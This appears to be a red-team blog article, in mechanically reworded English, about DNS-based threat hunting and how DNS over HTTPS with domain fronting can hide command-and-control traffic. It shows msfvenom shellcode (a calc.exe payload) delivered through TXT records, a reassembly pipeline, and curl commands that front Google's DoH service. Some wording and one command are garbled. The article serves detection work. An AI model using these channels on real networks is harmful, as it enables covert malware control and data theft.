DNS based threat hunting and DoH (DNS over HTTPS)

blog.redteam.pl 6 lat temu

Malicious communication over encrypted HTTPS channel is in fact nothing new, but DoH (DNS Queries over HTTPS [https://tools.ietf.org/html/rfc8484]) can aid a lot in hiding communication with C&C (a.k.a. C2). What is fresh in this case and changes a lot, is that well known and trusted vendors specified as Google, CloudFlare etc are starting to run its own DoH services. This fresh future can be utilized by red teamers as well as abused by threat actors specified as attackers, malware creators etc.

Few words about current common approach to detection

One of general approaches utilized in threat hunting is detection of malicious communication based on the DNS traffic. erstwhile an attacker is communicating with the C&C utilizing old kind methods specified as HTTP(S) it is rather easy to discover specified communication, if an organisation has anything which is able to detect specified attack like DNS firewall (e.g. OpenDNS household Shield [https://signup.opendns.com/familyshield/]) and/or traffic inspection utilizing SIEM etc, due to the fact that common detection tools are utilizing blacklists of malicious domains. erstwhile safety researchers are utilizing honeypots, execute malware analysis etc, or targeted companies study malicious domains, another organisations can collect these artifacts like domains and usage it for detection and/or blocking (e.g. DNS blackhole). As it is described in The Pyramid of Pain [http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html], this is 1 of the simplest mechanisms for threat hunting.

Another common way for malicious communication is to execute communication with C&C only over DNS queries and that way malware can communicate with C&C utilizing for example TXT, AXFR or ANY DNS records, but not only these as it all depends on creativity.

Quoting Cisco Talos Intelligence Group [https://blog.talosintelligence.com/2017/03/dnsmessenger.html]: “Typically this usage of DNS is related to the exfiltration of information. Talos late analyzed an interesting malware example that made usage of DNS TXT evidence queries and responses to make a bidirectional Command and Control (C2) channel. This allows the attacker to usage DNS communications to submit fresh commands to be run on infected machines and return the results of the command execution to the attacker. This is an highly uncommon and evasive way of administering a RAT.”, but in fact, this is not highly uncommon [https://attack.mitre.org/techniques/T1071/]. Each thought of utilizing DNS for malicious traffic is simply a small different, but at general point detection of specified is same. If any of your desktop computers in the office is doing TXT DNS queries, isn’t this suspicious? In which real case desktop, not server, is doing TXT query? specified queries are utilized usually by server services, for example to check SPF [https://support.google.com/a/answer/33786?hl=en], DKIM [https://support.google.com/a/answer/174124?hl=en] and any another domain verification for example utilized by Google [https://support.google.com/a/answer/183895?hl=en] etc.

Sample transfer of shellcode, commands or whatever malicious actor wants to transfer from C&C can look like:

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python

# size 220

# "\xd9\xf7\xd9\x74\x24\xf4\x5a\xbf\x3e\x85\xd7\x8e\x2b"

# "\xc9\xb1\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x3a\x67"

# "\x22\x72\xaa\xe5\xcd\x8b\x2a\x8a\x44\x6e\x1b\x8a\x33"

# "\xfa\x0b\x3a\x37\xae\xa7\xb1\x15\x5b\x3c\xb7\xb1\x6c"

# "\xf5\x72\xe4\x43\x06\x2e\xd4\xc2\x84\x2d\x09\x25\xb5"

# "\xfd\x5c\x24\xf2\xe0\xad\x74\xab\x6f\x03\x69\xd8\x3a"

# "\x98\x02\x92\xab\x98\xf7\x62\xcd\x89\xa9\xf9\x94\x09"

# "\x4b\x2e\xad\x03\x53\x33\x88\xda\xe8\x87\x66\xdd\x38"

# "\xd6\x87\x72\x05\xd7\x75\x8a\x41\xdf\x65\xf9\xbb\x1c"

# "\x1b\xfa\x7f\x5f\xc7\x8f\x9b\xc7\x8c\x28\x40\xf6\x41"

# "\xae\x03\xf4\x2e\xa4\x4c\x18\xb0\x69\xe7\x24\x39\x8c"

# "\x28\xad\x79\xab\xec\xf6\xda\xd2\xb5\x52\x8c\xeb\xa6"

# "\x3d\x71\x4e\xac\xd3\x66\xe3\xef\xb9\x79\x71\x8a\x8f"

# "\x7a\x89\x95\xbf\x12\xb8\x1e\x50\x64\x45\xf5\x15\x9a"

# "\x0f\x54\x3f\x33\xd6\x0c\x02\x5e\xe9\xfa\x40\x67\x6a"

# "\x0f\x38\x9c\x72\x7a\x3d\xd8\x34\x96\x4f\x71\xd1\x98"

# "\xfc\x72\xf0\xfa\x63\xe1\x98\xd2\x06\x81\x3b\x2b"

$ host -t txt payload.redteam.pl

redteam.pl descriptive text "00 d9f7d97424f45abf3e85d78e2b"

redteam.pl descriptive text "01 c9b131317a18037a1883c23a67"

redteam.pl descriptive text "13 7a8995bf12b81e506445f5159a"

redteam.pl descriptive text "14 0f543f33d60c025ee9fa40676a"

redteam.pl descriptive text "15 0f389c727a3dd834964f71d198"

redteam.pl descriptive text "16 fc72f0fa63e198d206813b2b"

redteam.pl descriptive text "06 980292ab98f762cd89a9f99409"

redteam.pl descriptive text "07 4b2ead03533388dae88766dd38"

redteam.pl descriptive text "08 d6877205d7758a41df65f9bb1c"

redteam.pl descriptive text "09 1bfa7f5fc78f9bc78c2840f641"

redteam.pl descriptive text "10 ae03f42ea44c18b069e724398c"

redteam.pl descriptive text "11 28ad79abecf6dad2b5528ceba6"

redteam.pl descriptive text "12 3d714eacd366e3efb979718a8f"

redteam.pl descriptive text "02 2272aae5cd8b2a8a446e1b8a33"

redteam.pl descriptive text "03 fa0b3a37aea7b1155b3cb7b16c"

redteam.pl descriptive text "04 f572e443062ed4c2842d0925b5"

redteam.pl descriptive text "05 fd5c24f2e0ad74ab6f0369d83a"

Numbers at the beginning of each line are utilized to keep the correct order as this is round-robin DNS [https://en.wikipedia.org/wiki/Round-robin_DNS] like approach and the order will be random for each answer.

$ host -t txt payload.redteam.pl | awk '{print $4,$5}' | kind | awk '{print $2}' | sed -s 's/"//' | sed 's/../\\x\0/g'

\xd9\xf7\xd9\x74\x24\xf4\x5a\xbf\x3e\x85\xd7\x8e\x2b

\xc9\xb1\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x3a\x67

\x22\x72\xaa\xe5\xcd\x8b\x2a\x8a\x44\x6e\x1b\x8a\x33

\xfa\x0b\x3a\x37\xae\xa7\xb1\x15\x5b\x3c\xb7\xb1\x6c

\xf5\x72\xe4\x43\x06\x2e\xd4\xc2\x84\x2d\x09\x25\xb5

\xfd\x5c\x24\xf2\xe0\xad\x74\xab\x6f\x03\x69\xd8\x3a

\x98\x02\x92\xab\x98\xf7\x62\xcd\x89\xa9\xf9\x94\x09

\x4b\x2e\xad\x03\x53\x33\x88\xda\xe8\x87\x66\xdd\x38

\xd6\x87\x72\x05\xd7\x75\x8a\x41\xdf\x65\xf9\xbb\x1c

\x1b\xfa\x7f\x5f\xc7\x8f\x9b\xc7\x8c\x28\x40\xf6\x41

\xae\x03\xf4\x2e\xa4\x4c\x18\xb0\x69\xe7\x24\x39\x8c

\x28\xad\x79\xab\xec\xf6\xda\xd2\xb5\x52\x8c\xeb\xa6

\x3d\x71\x4e\xac\xd3\x66\xe3\xef\xb9\x79\x71\x8a\x8f

\x7a\x89\x95\xbf\x12\xb8\x1e\x50\x64\x45\xf5\x15\x9a

\x0f\x54\x3f\x33\xd6\x0c\x02\x5e\xe9\xfa\x40\x67\x6a

\x0f\x38\x9c\x72\x7a\x3d\xd8\x34\x96\x4f\x71\xd1\x98

\xfc\x72\xf0\xfa\x63\xe1\x98\xd2\x06\x81\x3b\x2b

Using just a DNS query we were able to transfer shellcode. Same way threat actor is not only able to download information, but can besides send (leak) data due to the fact that it is adequate space in each DNS query to do that:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.example.com

To detect this we can measurement the entropy of request, its length, frequency, responses and its TTL etc, but this is not the main subject of this article so we will skip it.

Whole approach is in fact related to malicious actors creativity but summing above, usually attackers can be detected by threat hunting which is based on simple inspection of DNS traffic – monitoring interior DNS logs and besides if possible communication to external DNS services which should not happen in common organisation environment as all computers usually are utilizing interior DNS servers. If any computers are resolving domains from external DNS services this should definitely trigger an alert and should be inspected why it is occuring. utilizing these techniques we are able to detect i.a. first communication to HTTPS C&C server, C&C communication which is full done only with DNS requests, malware which is utilizing DGA (Domain Generating Algorithm) etc.

Also keep in head that attackers can communicate with HTTP server utilizing just an IP address, so without domains and DNS queries, but usually they don’t due to the fact that it is simply a lot easier to take down a service which is referred straight to a hardcoded IP than to take down a domain which is utilized for malicious behaviour. usually domains are hardcoded in the malware or DGA is in usage as mentioned before. For direct IP communication we can do detection which will be based on GeoIP (country based), IP reputation, malicious IP lists (same as with domains), ports and protocol inspections etc. usually this is besides utilized as another layer for threat hunting techniques where DNS based detection is 1 of them. These are fundamentals of threat hunting, which are described in mentioned above The Pyramid of Pain.

DNS over HTTPS (DoH) as a channel for C2 communication

Since DoH is in use, and what is the main focus of this article, there are DoH services offered by trusted vendors, this can be utilized as fresh kind for old ideas. Main problem is that any DoH services specified as these offered by Google or CloudFlare, are categorized and rated as trusted hosts and will not trigger alerts in detection systems. Traffic to specified vendors is common in almost all organisation and it makes detection a lot harder.

DoH is utilizing an approach which is designed for user privacy due to the fact that everyone in your local network, ISPs etc can see DNS traffic. This is besides a problem for Tor users etc. In short no 1 knows what you watch on youtube.com but everyone knows that you visit youtube.com due to the fact that DNS queries are not encrypted as HTTPS traffic is. In fact these are not only DNS queries which leak VirtualHost (Apache [https://httpd.apache.org/docs/2.4/vhosts/index.html]) / Server Block (nginx [https://www.nginx.com/resources/wiki/start/topics/examples/server_blocks/]) name but besides SSL/TLS certificates – it will be described below.

It is worth mentioning that DoT (DNS over TLS) services besides be but we will not focus on this due to the fact that main mark for this article is threat hunting and red teaming. DoT can be easy detected by simply monitoring the traffic to 853/tcp port. If no 1 in your organisation is utilizing DoT, it is simply a rather fresh and not common standard, and only any hosts are starting to communicate utilizing it, this is the reason why it is easy to detect it. We are not talking about what is better in a substance of privacy DoT vs DoH, so that is why we will not focus on DoT. Not to even mention that specified ports usually will be blocked on the organisation firewall, what we can’t say about 443/tcp (HTTPS).

DoH is hard to detect due to the fact that full communication is done over HTTPS, which is encrypted and considered common network traffic, there is nothing peculiar that could easy trigger an alert about any malicious communication:

$ curl 'https://dns.google.com/resolve?name=example.com&type=TXT'

{"Status": 0,"TC": false,"RD": true,"RA": true,"AD": false,"CD": false,"Question":[ {"name": "example.com.","type": 16}],"Answer":[ {"name": "example.com.","type": 16,"TTL": 18585,"data": "\"v=spf1 -all\""}]}

Traffic for that request looks like this:

192.168.0.109 192.168.0.1 DNS 74 Standard query 0xfa6c A dns.google.com

192.168.0.109 192.168.0.1 DNS 74 Standard query 0xb49b AAAA dns.google.com

192.168.0.1 192.168.0.109 DNS 338 Standard query consequence 0xfa6c A dns.google.com A 216.58.215.110 NS ns2.google.com NS ns4.google.com NS ns3.google.com NS ns1.google.com A 216.239.32.10 AAAA 2001:4860:4802:32::a A 216.239.34.10 AAAA 2001:4860:4802:34::a A 216.239.36.10 AAAA 2001:4860:4802:36::a A 216.239.38.10 AAAA 2001:4860:4802:38::a

192.168.0.1 192.168.0.109 DNS 350 Standard query consequence 0xb49b AAAA dns.google.com AAAA 2a00:1450:401b:803::200e NS ns3.google.com NS ns4.google.com NS ns1.google.com NS ns2.google.com A 216.239.32.10 AAAA 2001:4860:4802:32::a A 216.239.34.10 AAAA 2001:4860:4802:34::a A 216.239.36.10 AAAA 2001:4860:4802:36::a A 216.239.38.10 AAAA 2001:4860:4802:38::a

OK, there is simply a communication to Google ASN but we can detect a query to DNS for dns.google.com record. This is simply a good approach, to monitor for DoH endpoints, but the problem is that an attacker can establish communication without this DNS query:

$ curl -k -H 'Host: dns.google.com' 'https://216.58.215.78/resolve?name=example.com&type=TXT'

{"Status": 0,"TC": false,"RD": true,"RA": true,"AD": true,"CD": false,"Question":[ {"name": "example.com.","type": 16}],"Answer":[ {"name": "example.com.","type": 16,"TTL": 5477,"data": "\"v=spf1 -all\""}]}

OK, better but inactive this can be detected for example by utilizing Wireshark display filter specified as:

tls.handshake.type == 1 && !tls.handshake.extension.type == 0

This can be besides utilized for detection as column tls.handshake.extensions_server_name:

In case of direct communication with IP utilizing just HTTP header “Host” to choice VirtualHost/Server Block the “Server Name” column will not contain anything, and that can alert a threat huntsman as specified communication is not common.

Some time ago Deloitte Greece ethical hacking team presented a method which they named in short the "LAME" technique [https://dotelite.gr/the-lame-technique/], quoting the authors: “It is possible to get a trusted SSL Certificate for a public DNS name resolving to interior IP address and usage it for establishing encrypted communication channels [with C&C] within interior networks”. This is simply a good example how simple DNS based threat hunting can be effective. erstwhile a domain resolves to a LAN or non-routable IP address then surely it should trigger an alert if any of your organisation computers are querying the DNS server for specified domain.

Historically this was a method utilized by bot masters to temporary deactivate botnets which for example were IRC based and the malware binary had a hardcoded domain. Each bot tried to reconnect in any period of time to the IRC server but erstwhile a domain started to point at localhost (IN A 127.0.0.1) then each bot switched to a standby state – wasn’t able to connect as there was no local IRC service, so it kept trying to connect and querying DNS for C&C domain after TTL time has passed. That way it was only possible to take down a botnet by controlling domain, due to the fact that without this it was even not possible to see how large the botnet is as zombies (bot) were not connecting to the C&C, but tried connecting to localhost as long as the domain was pointing there, besides short TTL (in DNS it is time in seconds) was in use. If a botmaster needed access to the botnet then it was all about starting the C&C and then changing DNS records, each zombie was reconnecting whenever the requested domain was pointing again to the C&C IP address.

Getting back to the "LAME" technique, the communication is indeed encrypted but as mentioned above, we can see the certificate details which are not encrypted in SSL/TLS first communication (Client Hello), and that includes i.a. domains (as above, tls.handshake.extensions_server_name display filter in Wireshark). Now we see an external domain which is utilized in communication between 2 (or more) hosts in LAN, preceded with a DNS query that resolves to a LAN IP, isn’t this suspicious? Yes, of course it is, and it is 1 of simplest DNS based detection rules. In conclusion the authors of this method write: “This can be utilized as a covert lateral movement technique, which bypasses intrusion detection / monitoring tools.”, but in fact it makes detection even more effective due to the fact that erstwhile companies execute threat hunting then usually DNS based detection is in usage as simplest threat hunting method which doesn’t require any large investment. Not to even mention that in fact utilizing this method can trigger an IDS alert and most likely there is little detection hazard erstwhile we will not usage it at all than erstwhile we make things harder… simple solutions work best. Even erstwhile we run a red teaming engagement or malware actors are performing attacks, little complicated things, little uncommon traffic etc make it harder to detect, even erstwhile there is plaintext communication. Let’s remember that usually in LAN sysadmins are communicating with servers by IPs or utilizing interior TLD domains (like server.redteam, there is no TLD “redteam” but we can have any TLD we want in our interior network and it will only work for computers which are utilizing our interior DNS server). How many times sysadmins are utilizing external domains (which does not belong to the organization) to any interior HTTPS communication, zero? Personally I have never encountered specified an approach.

Bypass DoH detection with Domain Fronting

Problem is that a method called Domain Fronting [https://en.wikipedia.org/wiki/Domain_fronting] besides exists, which can be utilized to i.a. bypass net censorship, but besides in malicious communication:

$ curl -H 'Host: dns.google.com' 'https://google.com/resolve?name=example.com&type=TXT'

In Wireshark specified traffic will look like:

This can look like a average net traffic as individual is querying Google with a web browser. It may look like it's average but does not should be if we will focus on the details, how real communication from a web browser looks like. We can number handshakes, size, time between requests, sequences with another hosts like consent.google.com, www.gstatic.com, adservice.google.com etc. delight note that a malicious actor can besides do more advanced simulation of a average user behaviour. This can become a neverending story, as threat actors can usage regular user behaviour simulation to transfer even more data as domain fronting can be utilized most likely for all possible Google hosts:

$ host -t A google.com

google.com has address 172.217.16.46

$ host -t A dns.google.com

dns.google.com has address 216.58.215.78

$ curl -H 'Host: dns.google.com' 'https://google.com/resolve?name=example.com&type=TXT'

$ curl -k -H 'Host: dns.google.com' 'https://172.217.16.46/resolve?name=example.com&type=TXT'

$ curl -k -H 'Host: dns.google.com' 'https://216.58.215.78/resolve?name=example.com&type=TXT'

$ host -t A adservice.google.com

adservice.google.com is an alias for pagead46.l.doubleclick.net.

pagead46.l.doubleclick.net has address 172.217.20.194

$ curl -k -H 'Host: dns.google.com' 'https://172.217.20.194/resolve?name=example.com&type=TXT'

$ host -t A google.pl

google.pl has address 172.217.16.35

$ curl -k -H 'Host: dns.google.com' 'https://172.217.16.35/resolve?name=example.com&type=TXT'

$ host -t A blogger.com

blogger.com has address 172.217.20.201

$ curl -k -H 'Host: dns.google.com' 'https://172.217.20.201/resolve?name=example.com&type=TXT'

$ curl -H 'Host: dns.google.com' 'https://blogger.com/resolve?name=redteam.pl&type=A'

{"Status": 0,"TC": false,"RD": true,"RA": true,"AD": false,"CD": false,"Question":[ {"name": "redteam.pl.","type": 1}],"Answer":[ {"name": "redteam.pl.","type": 1,"TTL": 8615,"data": "104.248.133.95"}]}

Another problem with distinguishing average traffic from a malicious 1 is that for example Firefox allows users to usage DoH [https://wiki.mozilla.org/Trusted_Recursive_Resolver], which is by default communicating with mozilla.cloudflare-dns.com. At this minute there are a fewer more DoH services [https://github.com/curl/curl/wiki/DNS-over-HTTPS] and in the future we should have a lot more available.

Summary

From 1 side it is better for user privacy erstwhile there are solutions like DoH in place, on the another hand it is harder to detect leaks with i.a. DLP (Data Leak Prevention) tools. This besides shows that products specified as DNS firewalls are not adequate for organisations to defend against hackers. Threat actors are inactive able to usage hardcoded domains or DGA in malware but with DoH it will be not detected with today’s DNS firewall solutions. presently erstwhile attacker is utilizing his own DNS server and the traffic is not encrypted, we can simply detect it by additional inspection of DNS related network traffic, not only DNS queries/logs from our service. With DoH we will see HTTPS communication to i.a. google.com, not even knowing that it is simply a DNS query. This is not only a way to send hidden DNS queries but a large approach to leak data outside the organisation network without being detected. The request arises to execute real threat hunting, not just usage products advertised with buzzwords. Detection needs to be based on cognition from the top of The Pyramid of Pain – Tactics, Techniques and Procedures (TTPs). Threat hunters request to think like highly skilled threat actors, not only to detect well known and common techniques which are usually utilized only by low skilled attackers, specified as script kiddies.

Threat hunters request to have akin skills as red teamers, and vice versa, if red teamers want to keep up and execute simulations of attacks that can go undetected. Good example on how NOT to do simulation of attacks is mentioned above The "LAME" technique – it sounds large but in fact it makes detection easier compared to a case erstwhile there is no specified method in usage and attackers don’t encrypt communication in the interior network. Most organizations don’t store LAN traffic, but even if they are, this is about not being detected (successful attack) vs. leave more forensics artifacts, and we are talking primarily about post-exploitation and lateral movement artifacts, which most likely will not be connected to any external resources – which approach you will choose as an attacker, leave more forensics evidence or be able to execute a successful attack without detection during the ongoing engagement? utilizing DoH with domain fronting creates a real problem for detection in a common environment, in fact just due to the fact that it will be possible to establish malicious communication over a trusted vendors as proxy. We can check time (outside of working hours), compare time between requests etc but there is no apparent alert just for DoH without encountering many false positives. Anyway threat hunting is not about detecting all the things, it should trigger alerts which almost never are false positives, it should detect any stages of attacks but don’t request to detect all, i.a. due to computing power and having more false positives, which can drop our defender ending in overlooking a real attack.